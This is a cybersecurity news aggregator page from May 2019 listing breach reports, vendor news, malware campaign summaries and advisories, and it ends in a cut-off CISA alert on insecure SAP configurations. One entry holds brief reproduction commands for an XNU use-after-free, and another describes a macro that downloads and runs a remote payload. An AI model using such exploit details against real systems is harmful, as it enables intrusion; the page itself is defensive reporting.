DERUUA

Latest news about information security threats and incidents

information security incidents

Prevention of security threats and incidents described below is wiser and cheaper than forensic investigations and mitigation of the consequences of a cyber attack.

You can get evidence of this fact from the news below.

Use our services to find and mitigate your security vulnerabilities before the security threat agents find them.




US Government Issues Alert Warning against China Made Drones

As the Chinese-made drones pose a "cyber-espionage” threat to the American organizations and different businesses that utilize them the US government issued an alert cautioning against them. The said warning does not allude to a particular organization or company but rather the notice included that.... (more)

Posted on 23 May 2019 1:02 am


3 Things You Need to Know About Summer Cybersecurity

The summer season is quickly approaching. Users will take to the skies, roads, and oceans to travel throughout the world for a fun family adventure. But just because users take time off doesn’t mean that their security should. So, with the season’s arrival, we decided to conduct a survey so to.... (more)

Posted on 23 May 2019 12:10 am


Getting ready for digital transformation: The biggest cybersecurity challenges - Help Net Security

Getting ready for digital transformation: The biggest cybersecurity challenges. Digital transformation (DX) is becoming the largest driver of new technology investments and projects among businesses and IDC forecasts that global spending on DX will reach $1.18 trillion in 2019. (more)

Posted on 22 May 2019 10:01 pm


ZTE opens cybersecurity laboratory in Italy - RCR Wireless News

Chinese vendor ZTE Corporation has officially launched its cybersecurity laboratory in Rome, Italy. The vendor said that the establishment of the cybersecurity laboratory in Italy is an important measure for ZTE to promote transparency and enhance mutual trust with all third parties. (more)

Posted on 22 May 2019 10:01 pm


New standard Cyber Security Clause agreed by BIMCO's Documentary Committee - PortNews IAA

New standard Cyber Security Clause agreed by BIMCO’s Documentary Committee. BIMCO say its Documentary Committee has agreed a new standard Cyber Security Clause that requires the parties to implement cyber security procedures and systems, to help reduce the risk of an incident and mitigate the consequences should a security breach occur. (more)

Posted on 22 May 2019 10:01 pm


Proactive Malware Intelligence & Increasing ROI of SIEM & SOAR Deployments

With today's challenges from an increasingly hostile threat landscape, combined with a lack of people, expertise, and budget, organizations are driving toward optimizing their SIEM and SOAR solutions in order to get the highest return their investment. (more)

Posted on 22 May 2019 9:32 pm


Google Stored Unhashed G Suite Passwords for Years

Google is notifying G Suite enterprise users and administrators this week that the company had inadvertently stored passwords in an unhashed, but still encrypted, state for several years because of a flaw in the platform's administration console. See Also: Webinar | Passwords: Here Today, Gone Tomorrow? Be Careful What You Wish For. (more)

Posted on 22 May 2019 8:21 pm


Siemens, Alphabet’s Chronicle forge cybersecurity partnership

News and articles about cyber security, information security, vulnerabilities, exploits, patches, releases, software, features, hacks, laws, spam, viruses, malware, trojans. Siemens, Alphabet’s Chronicle forge cybersecurity partnership. Chronicle’s Backstory platform will be combined with Siemens’ cybersecurity tools​ for the energy industry. (more)

Posted on 22 May 2019 8:03 pm


Packet Storm Security Advisories: Ubuntu Security Notice USN-3992-1

Ubuntu Security Notice 3992-1 - A large number of security issues were discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting.... (more)

Posted on 22 May 2019 7:13 pm


The Cybersecurity Industry’s Third-Party Risk Management Problem Is Rooted in Visibility

Third-party risk management is an issue that keeps many chief information security officers (CISOs) and other security leaders awake at night. Third-party risk has a lot more in common with phishing than advanced persistent threats (APTs) or zero-day attacks; it’s a known issue, but there’s a huge.... (more)

Posted on 22 May 2019 5:35 pm


Did The U.S. Navy Launch A cyber Attack On The U.S. Air Force

. U.S. soldiers on “virtual missions” (IMAGE U.S. Army) Military Times: The Air Force is investigating the Navy for a cyber intrusion into its network, according to a memo obtained by Military Times. The bizarre turn of events stems from a decision by a Navy prosecutor to embed hidden tracking.... (more)

Posted on 22 May 2019 4:40 pm


How to Download Tor for Android, an Internet Browser That Won’t Spy on You

The Tor Project has announced the first stable release of its ultra-secure internet browser for Android devices—and you can download it for free right now. The software comes with a slew of privacy protections that are not typically available in rival browsers such as Google Chrome, Safari or Microsoft Edge, developers said. (more)

Posted on 22 May 2019 4:27 pm


Truecaller users' data available for sale: Rs 1.5lakh for Indian users' info

Another day, another data breach. This time your favourite calls identity app – Truecaller – is facing data breaching allegation. Data of Truecaller users, which includes names, phone numbers and email addresses of users worldwide, is available for sale on the dark web, according to a cybersecurity analyst. (more)

Posted on 22 May 2019 4:10 pm


Cyber Command's latest VirusTotal upload has been linked to an active attack

The malware sample that U.S. Cyber Command uploaded to VirusTotal last week is still involved in active attacks, multiple security researchers tell CyberScoop. Researchers from Kaspersky Lab and ZoneAlarm, a software security company run by Check Point Technologies, tell CyberScoop they have linked.... (more)

Posted on 22 May 2019 3:57 pm


Cache of 49 million Instagram records found online

A security researcher has discovered a massive cache of data for millions of Instagram accounts, publicly accessible for everyone to see. The account included sensitive information that would be useful to cyberstalkers, among others. A security researcher calling themselves anurag sen on Twitter.... (more)

Posted on 22 May 2019 3:31 pm


Computer Infected with 6 High-Profile Viruses Surpasses $1M in Auction

A Windows laptop infected with six high-profile computer viruses has surpassed a value of one million dollars in public auction bids. For a project called “The Persistence of Chaos,” contemporary internet artist Guo O. Dong and security firm Deep Instinct infected a Samsung NC10-14GB 10. (more)

Posted on 22 May 2019 2:53 pm


Dark Web Secrets: What Should You Know About Your Information Being on the Dark Web?

Just hearing “ dark web ” sounds sinister, and it can be. There’s a lot of information passed around on the dark web, and much of it involves criminal activity. A lot of security firms have expanded their offerings to included cybersecurity protection for schools, businesses, and individuals because.... (more)

Posted on 22 May 2019 2:46 pm


Kaspersky warns of major rise in DDoS attacks

Businesses should prepare for a “ DDoS storm ”, as the number of such attacks has grown rapidly in the past three months. This news comes courtesy of Kaspersky Lab, whose researchers claim there has been an 84 per cent surge in DDoS attacks in the first quarter of 2019, compared to the last quarter of 2018. (more)

Posted on 22 May 2019 2:42 pm


6 keys to MongoDB database security

Don’t be the next MongoDB data breach. Close these holes in your MongoDB deployment before it’s too late Security is a trending topic again, thanks to recent data leaks involving big corporations. For example, as reported by ZDNet , Chinese companies have leaked an astonishing 590 million resumes. (more)

Posted on 22 May 2019 2:35 pm


Satan Ransomware Expands Portfolio of Exploits

A recently observed Satan ransomware variant has added exploits to its portfolio and is looking to compromise more machines by targeting additional vulnerabilities. First observed in early 2017, the malware has received constant updates to more effectively compromise machines and maximize the attackers’ profits. (more)

Posted on 22 May 2019 2:10 pm


PoC Exploit For Unpatched Windows 10 Zero-Day Flaw Published Online

An anonymous hacker with an online alias “SandboxEscaper” today released proof-of-concept (PoC) exploit code for a new zero-day vulnerability affecting Windows 10 operating system—that’s his/her 5th publicly disclosed Windows zero-day exploit [1, 2, 3] in less than a year. (more)

Posted on 22 May 2019 11:38 am


XNU Stale Pointer Use-After-Free

XNU: Use-after-free due to stale pointer left by in6_pcbdetach Related CVE Numbers: CVE-2019-8605Fixed-2019-May-13. # Reproduction Repros on 10.14.3 when run as root. It may need multiple tries to trigger. $ clang -o in6_selectsrc in6_selectsrc.cc $ while 1; do sudo ./in6_selectsrc; done res0: 3 res1: 0 res1. (more)

Posted on 22 May 2019 11:24 am


European Political parties Europe and USA are still struggling with cybersecurity basics

Political parties in Europe and the U.S. have cybersecurity practices that fail to meet basic standards, leaving them vulnerable to hackers and foreign influence operations with elections rapidly approaching, according to security researchers. An assessment of 29 political parties in 11 countries.... (more)

Posted on 22 May 2019 10:34 am


Aussie Government IT Worker Arrested for Cryptomining

An Australian government IT contractor has been arrested on suspicion of making thousands from an illegal cryptocurrency mining operation at work. The 33-year-old New South Wales man appeared in court today after allegedly earning AU$9000 ($6188) by “modifying his agency’s computer systems,” according to the Australian Federal Police (AFP). (more)

Posted on 22 May 2019 6:58 am


Attack Combines Phishing, Steganography, PowerShell to Deliver Malware

Researchers have discovered a malware campaign targeting Japan and combining phishing, steganography, PowerShell, and the URLZone and Ursnif malwares. The basic process described in a new report from Cybereason is a malspam campaign with a weaponized Excel document containing a PowerShell script that downloads steganographic images. (more)

Posted on 22 May 2019 6:58 am


How Australia led the US in its global war against Huawei

Mike Burgess, the head of the signals directorate, recently explained why the security of fifth generation, or 5G, technology was so important: It will be integral to the communications at the heart of a country's critical infrastructure - everything from electric power to water supplies to sewage,.... (more)

Posted on 22 May 2019 4:53 am


WhatsApp says it moved fast to contain spyware attack damage

NEW DELHI: WhatsApp told the Indian government that it moved quickly to fix the vulnerability that allowed a spyware attack on users’ phones besides taking action against 4 million accounts to curb abuse of the platform during the general election. “While no safety programme including ours is.... (more)

Posted on 22 May 2019 4:27 am


Cyber-security gap - JTC Associates Ltd

Cyber-security gap. 21st May 2019. Commercial There’s a growing cyber-security gap among European businesses – with almost a third (29pc) of surveyed enterprises experiencing a breach last year, and only a little more than half (55pc) believe their digital transformation deployments are very or extremely secure. (more)

Posted on 22 May 2019 3:32 am


Slimstat: Stored XSS from Visitors

The WordPress Slimstat plugin, which currently has over 100k installs, allows your website to gather analytics data for your WordPress website. It will track certain information such as the browser and operating system details, plus page visits to optimize the website analytics. Versions below 4.8. (more)

Posted on 22 May 2019 2:14 am


Spirent incorporates NetSecOPEN test suite into its CyberFlood testing platform

, the trusted provider of test, measurement, assurance, and analytics solutions for next-generation devices and networks, announced that it has fully incorporated the NetSecOPEN test suite into its CyberFlood testing platform. The new built-in capabilities provide CyberFlood users with the ability.... (more)

Posted on 22 May 2019 2:03 am


USN-3991-1: Firefox vulnerabilities

21 May 2019 firefox vulnerabilities. A security issue affects these releases of Ubuntu and its derivatives: Ubuntu 19.04; Ubuntu 18.10; Ubuntu 18.04 LTS; Ubuntu 16.04 LTS Summary. Firefox could be made to crash or run programs as your login if it opened a malicious website. Software Description firefox - Mozilla Open Source web browser Details. (more)

Posted on 22 May 2019 1:19 am


Hackers Steal Payment Card Data Using Rogue Iframe Phishing

News and articles about cyber security, information security, vulnerabilities, exploits, patches, releases, software, features, hacks, laws, spam, viruses, malware, trojans. Cybercriminals have upgraded their credit card skimming scripts to use an iframe-based phishing system designed to phish for.... (more)

Posted on 21 May 2019 11:52 pm


Is Healthcare Sector Better Prepared for Ransomware Attacks?

Several recently reported breaches involving ransomware attacks in which organizations recovered without paying a ransom to extortionists offer a glimmer of hope that healthcare entities are getting better prepared to deal with such incidents. See Also: 10 Incredible Ways You Can Be Hacked Through.... (more)

Posted on 21 May 2019 10:55 pm


Irish Cyber Security Cluster officially launched in Cork

CORK, Ireland - Monday marked the official launch of the Irish Cyber Security Cluster, Cyber Ireland. The launch took place at Cork County Hall. The Cyber Security cluster organisation, which is backed by IDA Ireland, brings together industry, academia and government to represent the needs of the.... (more)

Posted on 21 May 2019 10:27 pm


What Is WordPress File Integrity Scanning & Why Your Site Needs It?

Have you ever had to clean your WordPress website from a malware infection? Do you know how to find out which code was compromised? Do you know if your developers or agency left backup and leftover files on your website that can leave you exposed? This post explains how File integrity monitoring (FIM) helps you answer such questions. (more)

Posted on 21 May 2019 10:24 pm


Getting to Know the New RSAC Advisory Board Members: Dawn Cappelli

Name : Dawn Cappelli Title and company : VP Global Security and CISO, Rockwell Automation Number of years in the information security industry : 18 RSAC What was your first job in the infosec industry? I started working at Carnegie Mellon University’s CERT Program one month before 9/11. I was hired to help the US. (more)

Posted on 21 May 2019 10:11 pm


Mozilla Releases Security Updates for Firefox

News and articles about cyber security, information security, vulnerabilities, exploits, patches, releases, software, features, hacks, laws, spam, viruses, malware, trojans. Original release date: May 21, 2019. Mozilla has released security updates to address vulnerabilities in Firefox and Firefox ESR. (more)

Posted on 21 May 2019 10:11 pm


Cyber attack on Sunderland City Council database: Investigation after library users' personal data accessed by hackers - Sunderland Echo

Hackers have accessed users' personal details in a cyber attack on Sunderland City Council's library database. Council chiefs are warning users to be vigilant after a number of customers' details were accessed during a cyber incident involving the library services customer database. (more)

Posted on 21 May 2019 8:48 pm


Low CVE-2019-12215: Matomo Matomo

Description: ** DISPUTED ** A full path disclosure vulnerability was discovered in Matomo v3.9.1 where a user can trigger a particular error to discover the full path of Matomo on the disk, because lastError.file is used in plugins/CorePluginsAdmin/templates/safemode.twig. (more)

Posted on 21 May 2019 8:42 pm


“Hackable?” Puts Smartphones to the Test

Is the Personal Data on Your Smartphone Vulnerable? Listen to Find Out: Used for everything from banking and taking pictures, to navigating, streaming, and connecting, mobile devices are a treasure trove of sensitive personal data. On the latest episode of “Hackable?” the team investigates how.... (more)

Posted on 21 May 2019 7:51 pm


MuddyWater APT Group Upgrades Tactics to Avoid Detection

MuddyWater, a relatively new advanced persistent threat group that is targeting organizations in the Middle East, has changed some of its tactics to avoid detection while continuing to plant backdoors within targeted networks, according to new research from See Also: Webinar | Key Trends in.... (more)

Posted on 21 May 2019 6:10 pm


WEBINAR: How to Get Enterprise Cyber Security for your Mid-Sized Organization

High-quality cybersecurity posture is typically regarded as the exclusive domain of the large and heavy resourced enterprises – those who can afford a multi-product security stack and a skilled security team to operate it. This implies a grave risk to all organizations who are not part of this.... (more)

Posted on 21 May 2019 5:53 pm


Crossword Cybersecurity Consulting unit launches new information security product - Proactive Investors UK

"We are delighted to have launched our virtual CISO service with a three-year contract, Crossword's largest value contract to date,” said Stuart Jubb, managing director of the unit. The product aims to be a cheaper alternative to having a Chief Information Security Officer. (more)

Posted on 21 May 2019 5:27 pm


Schumer asks government to probe rail tech from China

By Nandita Bose. WASHINGTON (Reuters) - U.S. Senate Democratic leader Chuck Schumer is asking the federal government to investigate if a plan for new subway cars in New York City, designed by a Chinese state-owned firm, could pose a threat to national security. (more)

Posted on 21 May 2019 5:11 pm


Computrols CBAS Web

Advisory Document (more)

Posted on 21 May 2019 5:05 pm


Value Added Distributor Rain Networks chooses CloudCare for its distribution portfolio

21 May 2019. CloudCare helps its MSP clients gain competitive edge by delivering critical security services from one platform. The Company. Rain Networks isn’t your average IT solutions distributor. Starting operations in 2003, the Seattle-based company initially sold antivirus software solutions to.... (more)

Posted on 21 May 2019 5:03 pm


Mitsubishi Electric MELSEC-Q Series Ethernet Module

Advisory Document (more)

Posted on 21 May 2019 5:00 pm


49 Million Instagram Influencers, Celebrities Personal Data Leaked Online

A new massive database uncovered that contains nearly 49 million of Instagram Influencer’s, celebrities and brand account contact information leaked online. Security researcher Anurag Sen discovered this unprotected database and reported to Tech Crunch, in result, owners have been notified and secured the database. (more)

Posted on 21 May 2019 3:54 pm


HawkEye Attack Wave Sends Stolen Data to Another Keylogger Provider

A recent attack wave involving HawkEye malware sends data stolen from its victims to another keylogger provider’s website. On 21 May, My Online Security came across a new sample of HawkEye. The actual delivery mechanism itself wasn’t unique compared to previous attacks involving the malware. (more)

Posted on 21 May 2019 3:30 pm


How to block hijacking attacks on your Google account

Securing your Google account against the vast majority of account hijacking attempts is as simple as adding a recovery phone number, new research by Google, New York University, and the University of California, San Diego shows. The researchers discovered that the mere addition of a recovery phone.... (more)

Posted on 21 May 2019 3:08 pm


Windows Sandbox: How to use Microsoft's simple virtual Windows PC to secure your digital life

Microsoft may be positioning its upcoming, easy-peasy Windows Sandbox within the Windows 10 May 2019 Update as a safe zone for testing untrusted applications, but it’s much more than that. Windows Sandbox, and sandboxing PC apps in general, give you a solution for trying a “utility” that may be malware, or a website that you’re not sure about. (more)

Posted on 21 May 2019 3:05 pm


Industrial Robotics – Are You Increasing Your Cybersecurity Risk?

There’s nothing fundamentally novel about the use of robots in industrial environments. For nearly half a century, they’ve been changing the way that we manufacture products and deal with risk in hazardous environments. From automotive assembly lines to mines, robots have been helping to boost productivity and safety for decades. (more)

Posted on 21 May 2019 1:50 pm


Ransomware and malware attacks decline, attackers adopting covert tactics

There has been a major decline in ransomware and malware attacks, with Ireland having some of the lowest rates globally, according to the latest report released by Microsoft. ransomware attacks decline This is a significant change from 2017, following a prolific series of attacks that targeted supply chains globally. (more)

Posted on 21 May 2019 12:58 pm


Huawei gets 90-day reprieve for Android ban

Huawei has been granted a 90-day reprieve by the US government after Google was ordered to remove its access to services on the Android mobile OS. The bottom line is, nothing is changing right now. Your Huawei P30 Pro or Mate 20 will continue to function as normal, and you’ll be able to download, delete, and update apps as you’ve always been. (more)

Posted on 21 May 2019 12:51 pm


MuddyWater APT’s BlackWater Malware Campaign Install Backdoor on Victims PC to Gain Remote Access & Evade Detection

Researchers discovered a “Blackwater” malware campaign that suspected to associated with well known MuddyWater APT bypass the security control and install a backdoor on Victims PC using MuddyWater’s tactics, techniques, and procedures (TTPs). MuddyWater involved with a various cyber attack in recent.... (more)

Posted on 21 May 2019 12:50 pm


US fires arrow into Huawei's Achilles heel

The Trump administration's move to block US technology sales to Huawei shoots an arrow deep into the Chinese tech giant's Achilles heel—its over-reliance on American components—and threatens the company's very survival, analysts said. Citing national security , President Donald Trump last week.... (more)

Posted on 21 May 2019 11:59 am


Websites of at least eleven institutions in Sri Lanka hit by cyber attacks

Several .lk and .com websites belonging to different institutions in Sri Lanka were defaced in the cyber attack. However, none of the gov.lk websites are affected by the attack. Cybercriminals have defaced websites of at least 11 institutions in Sri Lanka in a recent cyber attack. (more)

Posted on 21 May 2019 11:10 am


Instagram Influencer’s Account Information Exposed

The life of Instagram Influencers goes public. An exposed database seems to have been added to the information available about them. According to a TechCrunch report, account details of 49 million Instagram users, including influential people and brand accounts, have been published online. (more)

Posted on 21 May 2019 9:20 am


W97M/Downloader Malware Dropper Served from Compromised Websites

W97M/Downloader is part of a large banking malware operation that peaked in March 2016. Bad actors have been distributing this campaign for well over a year, which serves as a doorway to Vawtrak and Dridex banking trojans. This malware campaign targets a wide array of users via their operating system and browser to deliver the appropriate payload. (more)

Posted on 21 May 2019 7:28 am


U.S. eases restrictions on Huawei; founder says U.S. underestimates Chinese firm

The U.S. Commerce Department will allow Huawei Technologies Co Ltd to purchase American-made goods in order to maintain existing networks and provide software updates to existing Huawei handsets. The world’s largest telecommunications equipment maker is still prohibited from buying American parts.... (more)

Posted on 21 May 2019 7:16 am


Exabeam enhances security management approach and boosts cybersecurity degree program

Exabeam, the Smarter SIEM company, announced a partnership with Deakin University in Australia to strengthen its security management approach and bolster its already distinguished cybersecurity degree program, delivered through the School of IT. The university not only deployed Exabeam Advanced.... (more)

Posted on 21 May 2019 7:07 am


US warns of China’s new sinister spies

It says they are being used to deliver ‘spyware’ to networks and redirect sensitive data. An overnight alert from DHS’s Cybersecurity and Infrastructure Security Agency states drones are a “potential risk to an organisation’s information” because they can “contain components that can compromise your.... (more)

Posted on 21 May 2019 6:36 am


New Executive Order To Further Restrict Business with Huawei and Other Foreign Adversaries Engaged in Cyber Espionage

On May 15, 2019, President Trump issued an Executive Order (“EO”) targeting activities of certain foreign telecommunications companies based in hostile countries. Entitled “ Securing the Information and Communications Technology and Services Supply Chain ,” the EO declares a national emergency based.... (more)

Posted on 21 May 2019 4:03 am


Trickbot Watch: Arrival via Redirection URL in Spam - TrendLabs Security Intelligence Blog

by Miguel Ang (Threats Analyst) We discovered a variant of the Trickbot banking trojan (detected by Trend Micro as TrojanSpy.Win32.TRICKBOT.THDEAI) using a redirection URL in a spam email. In this particular case, the variant used Google to redirect from the URL hxxps://google[. (more)

Posted on 21 May 2019 4:03 am


DHS Reportedly Warns of Chinese-Made Drones Stealing Data

The U.S. Department of Homeland Security is warning that Chinese-made drones could be sending sensitive data back to their manufacturers in China, where it can be accessed by the government, according to news reports from and others. See Also: Sunset of Windows Server 2008: Migrate with Docker The.... (more)

Posted on 21 May 2019 1:57 am


Staying Cyber Safe During Memorial Day

Original release date: May 20, 2019. As Memorial Day approaches, the Cybersecurity and Infrastructure Security Agency (CISA) reminds users to stay cyber safe. Users should be cautious of potential scams, such as unsolicited emails that contain malicious links or attachments with malware. (more)

Posted on 21 May 2019 12:28 am


Phishing: Mitigating Risk, Minimizing Damage

As phishing attacks continue to menace healthcare and other business sectors, security experts say organizations must take critical steps to prevent falling victim and help limit the potential damage. See Also: 10 Incredible Ways You Can Be Hacked Through Email & How To Stop The Bad Guys "Phishing.... (more)

Posted on 20 May 2019 11:53 pm


DHS warns of data threat from Chinese-made drones

WASHINGTON (Reuters) - The U.S. Department of Homeland Security has warned U.S. firms of the risks to company data from Chinese-made drones, according to a notice reviewed by Reuters on Monday. The notice, titled “Chinese Manufactured Unmanned Aircraft Systems,” warned that U.S. (more)

Posted on 20 May 2019 11:33 pm


Huawei can no longer use Android system on its smartphones

specialists report that Google has decided to suspend its business with the Chinese company , including activities of transfer of hardware, software and technical services except for the open source projects. This decision comes after President Donald Trump’s executive order, which prohibits.... (more)

Posted on 20 May 2019 10:51 pm


Coordinated anti-Trump campaign emerges on Instagram: study

May 21, 2019 00:07:04 IST. By Crispian Balmer. ROME (Reuters) - Accounts tagged 'hatetrump' and 'ihatetrump' are part of a coordinated campaign to undermine U.S. President Donald Trump that has emerged on social media site Instagram, an independent study has revealed. (more)

Posted on 20 May 2019 10:30 pm


GM says most new vehicles to get over-the-air upgrade tech by 2023

DETROIT: General Motors Co said on Monday most of its global models will be capable of over-the-air software upgrades by 2023, as the automaker rolls out new vehicle electrical systems designed to securely handle heavy data traffic and software downloads from the internet. (more)

Posted on 20 May 2019 8:40 pm


Linux Kernel Privilege Escalation Vulnerability Found in RDS Over TCP (SecurityWeek)

A memory corruption vulnerability recently found in Linux Kernel’s implementation of RDS over TCP could lead to privilege escalation. Tracked as CVE-2019-11815 and featuring a CVSS base score of 8.1, the flaw impacts Linux kernels prior to 5.0.8, but only systems that use the Reliable Datagram Sockets (RDS) for the TCP module. (more)

Posted on 20 May 2019 8:21 pm


Defiant Tech firm who operated LeakedSource pleads guilty

The Royal Canadian Mounted Police (RCMP), announced that the company behind LeakedSource, Defiant Tech Inc., pleads guilty in Canada. Defiant Tech Inc., the company behind the LeakedSource.com website, pleaded guilty in Canada. The LeakedSource website was launched in late 2015, in January 2017 the.... (more)

Posted on 20 May 2019 6:51 pm


ThreatQuotient Expands Integration with MITRE ATT&CK Framework to Offer Full Support for Customers

ThreatQ Adds Support for Mobile and PRE-ATT&CK in Response to Rapid Customer Adoption. LONDON 20th May 2019 ThreatQuotient , a leading security operations platform innovator, today announced that the ThreatQ integration with MITRE ATT&CK now includes support for PRE-ATT&CK and Mobile . (more)

Posted on 20 May 2019 5:10 pm


TeamViewer was Targeted by Chinese Hackers in 2016

By Ryan De Souza TeamViewer has only confirmed now that Chinese state-sponsored hackers targeted the company in 2016. The Germany-based company behind the world-famous remote desktop software TeamViewer has confirmed that in 2016 TeamViewer software was compromised. (more)

Posted on 20 May 2019 4:06 pm


ExtraHop for IBM QRadar part of collaborative development to stay ahead of evolving threats - Help Net Security

, provider of enterprise cyber analytics from the inside out, launched the ExtraHop for IBM QRadar app, which integrates with IBM Security Intelligence technology to stream accurate, contextual network behavioral detections into the QRadar SIEM. With Reveal(x) detections in QRadar, organizations.... (more)

Posted on 20 May 2019 3:53 pm


Julian Assange's Belongings Handed to US Prosecutors - WikiLeaks

The material is said to include two of Assange’s manuscripts. Kristinn Hrafnsson, the editor-in-chief of WikiLeaks, said: “On Monday, Ecuador will perform a puppet show at the embassy of Ecuador in London for their masters in Washington, just in time to expand their extradition case before the UK deadline on 14 June. (more)

Posted on 20 May 2019 2:48 pm


Will the U.S. government draft cybersecurity professionals?

Will there be a giant sucking sound of cybersecurity talent evading the draft by moving to Canada? The National Commission on Military, National and Public Service, created by Congress, is currently evaluating the Selective Service System (SSS) with an eye toward modernizing the draft, including the.... (more)

Posted on 20 May 2019 2:47 pm


How to Fight Back Against Macro Malware

In this example, the Shell function is called to execute the variable exec , which is a PowerShell command that downloads and executes payload.txt from a remote URL. Along with executing PowerShell commands, Visual Basic functions can be used to run other shell commands, access the file system and.... (more)

Posted on 20 May 2019 2:31 pm


NSW govt appoints new cyber chief

The NSW government has appointed Tony Chapman to oversee its realigned government-wide cyber security office as the state's new chief cyber security officer. Chapman, who has been acting chief information security officer since the departure of former CISO Maria Milosavljevic, took up the new position today. (more)

Posted on 20 May 2019 10:50 am


Alibaba Cloud, China Telecom, Google Cloud, HUAWEI CLOUD & McAfee – Catch them all in one place at Cloud Expo Asia, Hong Kong

McAfee (booth E09), the device-to-cloud cyber Security company, will showcase McAfee MVISION Cloud - the leading cloud access security broker (CASB) that protects data where it lives today, with a solution built natively in the cloud, for the cloud. "Cloud Expo Asia is the perfect platform to.... (more)

Posted on 20 May 2019 10:20 am


Phishing targeting SaaS and webmail services increased to 36% of all phishing attacks

Users of Software-as-a-Service ( SaaS ) and webmail services are being targeted with increasing frequency, according to the APWG Q1 2019 Phishing Activity Trends Report. The category became the biggest target in Q1, accounting for 36 percent of all phishing attacks , for the first time eclipsing the.... (more)

Posted on 20 May 2019 9:18 am


On the path to Zero Trust security: Time to get started

Patrick Sullivan, Senior Director, Security Technology and Strategy, Akamai May 20, 2019. On the path to Zero Trust security: Time to get started. No need to belabour the point. We all know that trying to defend the network perimeter is a bit futile in today’s mobile and cloud first world. (more)

Posted on 20 May 2019 9:11 am


Companies investing in advanced forensic capabilities to identify attackers in greater detail

One in five companies are already using forensic investigations and other sophisticated methods to identify their attackers, like setting up honey pots and repositories of fake data to give attackers the idea they’ve hit real data while acting as a diversion tactic, according to Neustar. (more)

Posted on 20 May 2019 9:04 am


Bengaluru topped cyber hitlist in 2018, says study

Awareness around cybercrimes was still quite low, which is worrying, said experts. BENGALURU: Bengaluru faced the highest number of cyberattacks in 2018, according to a report by Quick Heal that was shared exclusively with ET, and other cities including Mumbai, Delhi/National Capital Region and Kolkata also becoming victims to these attacks. (more)

Posted on 20 May 2019 8:59 am


Security researchers discover Linux version of Winnti malware

Winnti Linux variant used in 2015 in the hack of a Vietnamese gaming company. For the first time, security researchers have uncovered and analyzed a Linux variant of Winnti, one of the favorite hacking tools used by Beijing hackers over the past decade. (more)

Posted on 20 May 2019 8:05 am


Email Addresses and Passwords Leaked For 113,000 Users Of Account Hijacking Forum

"Ogusers.com -- a forum popular among people involved in hijacking online accounts and conducting SIM swapping attacks to seize control over victims' phone numbers -- has itself been hacked," reports security researcher Brian Krebs, " On May 12, the administrator of OGusers explained an outage to.... (more)

Posted on 20 May 2019 6:51 am


Checkmarx deploys CxSAST on Project Hosts’ FPC FedRAMP-authorized PaaS

, the Software Exposure Platform for the enterprise, has deployed CxSAST on Project Hosts’ Federal Private Cloud (FPC) FedRAMP-authorized Platform-as-a-Service (PaaS). This deployment facilitates Federal agencies to grant a FedRAMP Moderate or DOD Impact Level 5 (IL5) Authority to Operate (ATO) for.... (more)

Posted on 20 May 2019 5:44 am


JASK launches a new Heads Up Display for security operations centers

, the provider of the industry’s first cloud-native SIEM platform, unveiled a first-of-its-kind Heads Up Display (HUD) for security operations centers (SOCs) based on cutting-edge scientific design principles and visualization concepts never before used in the cybersecurity industry. (more)

Posted on 20 May 2019 5:44 am


Singapore opens new maritime cybersecurity operations centre

The Maritime and Port Authority of Singapore (MPA) has officially opened a Maritime Cybersecurity Operations Centre (MSOC) on Thursday to boost cyber defence readiness in the face of rising threats from cyber-attacks. The MSOC, housed and operated by ST Engineering at its electronic hub, conducts.... (more)

Posted on 20 May 2019 5:13 am


HSB Farm Cyber Insurance solution to protect farmers from hackers and malware

(HSB), part of Munich Re, announced a new HSB Farm Cyber Insurance solution that helps protect farmers and farm technology from hackers, malware and other cyber attacks. “Innovative technologies are being deployed across the farming industry and data and information systems are helping farmers.... (more)

Posted on 20 May 2019 4:02 am


Schneider Electric Modicon Controllers

Advisory Document (more)

Posted on 16 May 2019 5:05 pm


Fuji Electric Alpha7 PC Loader

Advisory Document (more)

Posted on 16 May 2019 5:00 pm


Omron Network Configurator for DeviceNet

Advisory Document (more)

Posted on 14 May 2019 5:40 pm


Siemens SIMATIC WinCC and SIMATIC PCS 7

Advisory Document (more)

Posted on 14 May 2019 5:35 pm


Siemens LOGO! Soft Comfort

Advisory Document (more)

Posted on 14 May 2019 5:30 pm


Siemens LOGO!8 BM

Advisory Document (more)

Posted on 14 May 2019 5:25 pm


Siemens SINAMICS PERFECT HARMONY GH180 Drives NXG I and NXG II

Advisory Document (more)

Posted on 14 May 2019 5:20 pm


Siemens SINAMICS PERFECT HARMONY GH180 Fieldbus Network

Advisory Document (more)

Posted on 14 May 2019 5:15 pm


Siemens SCALANCE W1750D

Advisory Document (more)

Posted on 14 May 2019 5:10 pm


Siemens SIMATIC PCS 7, WinCC, TIA Portal

Advisory Document (more)

Posted on 14 May 2019 5:05 pm


Siemens SIMATIC Panels and WinCC (TIA Portal)

Advisory Document (more)

Posted on 14 May 2019 5:00 pm


AA19-122A: New Exploits for Unsecure SAP Systems

Original release date: May 02, 2019 | Last revised: May 03, 2019 Summary The Cybersecurity and Infrastructure Security Agency (CISA) is issuing this activity alert in response to recently disclosed exploits that target unsecure configurations of SAP components. [ 1 ] Technical Details A presentation at the April 2019 Operation for Community Development and Empowerment (OPCDE) cybersecurity conference describes SAP systems with unsecure configurations exposed to the internet. Typically, SAP systems are not intended to be exposed to the internet as it is an untrusted network. Malicious cyber actors can attack and compromise these unsecure systems with publicly available exploit tools, termed “10KBLAZE.” The presentation details the new exploit tools and reports on systems exposed to the internet. SAP Gateway ACL The SAP Gateway allows non-SAP applications to communicate with SAP applications. If SAP Gateway access control lists (ACLs) are not configured properly (e.g., gw/acl_mode = 0), anonymous users can run operating system (OS) commands.[ 2 ] According to the OPCDE presentation, about 900 U.S. internet-facing systems were detected in this vulnerable condition. SAP Router secinfo The SAP router is a program that helps connect SAP systems with external networks. The default secinfo configuration for a SAP Gateway allows any internal host to run OS commands anonymously. If an attacker can access a misconfigured SAP router, the router can act as an internal host and proxy the attacker’s requests, which may result in remote code execution. According to the OPCDE presentation, 1,181 SAP routers were exposed to the internet. It is unclear if the exposed systems were confirmed to be vulnerable or were simply running the SAP router service. SAP Message Server SAP Message Servers act as brokers between Application Servers (AS). By default, Message Servers listen on a port 39XX and have no authentication. If an attacker can access a Message Server, they can redirect and/or execute legitimate man-in-the-middle (MITM) requests, thereby gaining credentials. Those credentials can be used to execute code or operations on AS servers (assuming the attacker can reach them). According to the OPCDE presentation, there are 693 Message Servers exposed to the internet in the United States. The Message Server ACL must be protected by the 